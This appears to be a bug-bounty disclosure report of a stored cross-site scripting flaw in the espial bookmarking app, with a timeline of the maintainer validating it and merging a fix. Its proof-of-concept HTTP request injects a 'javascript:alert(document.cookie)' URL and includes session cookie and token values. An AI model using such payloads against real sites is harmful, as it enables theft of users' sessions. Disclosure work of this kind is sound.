Cross-site Scripting (XSS) - Stored in jonschoning/espial

Valid

Reported on

Sep 27th 2021


Description

Stored XSS in url link

Proof of Concept

// PoC request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=SilFBialwul9V05BatfVPoUjOf0Klq8Ys0C/kWXvt6o2hKA8gHSKuInA6GCizZLuYIVindIkEq5wUOys/exSV06ByNuR6duw/qBMVA2BMC6evD1k/6RQLCjxm2AXjCJBjEU1jiXW/ZtTBdZyNhwPHI6SK4YClUoiIAfpXuUB+ysShu6Kx+8JCRK2igki/pHI6F/+nXgpt3fGW7Va9/SvIqFNzEtAmIpD0aNupcsEnpp9iG/gkml5J8HT3C0x8JMDRakuS+Em3a+6o9bkbptOS0nU9HVP5lGZsIygZXRB1w1wBE4dqVoXg21VwbARToY8VEbaJZV2CjiBQW8=; XSRF-TOKEN=dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
Content-Type: application/json
Content-Length: 192
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=back
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"javascript:alert(document.cookie)","toread":true,"title":"1234","time":null,"tags":"xss","slug":null,"selected":null,"private":true,"description":"902903","bid":null,"archiveUrl":null}

The XSS payload will trigger when the user clicks the link.

Impact

This vulnerability is capable of stored XSS

We have contacted a member of the jonschoning/espial team and are waiting to hear back 2 months ago
Jon Schoning validated this vulnerability 2 months ago
M0rphling has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on 2d3b3c 2 months ago
Jon Schoning has been awarded the fix bounty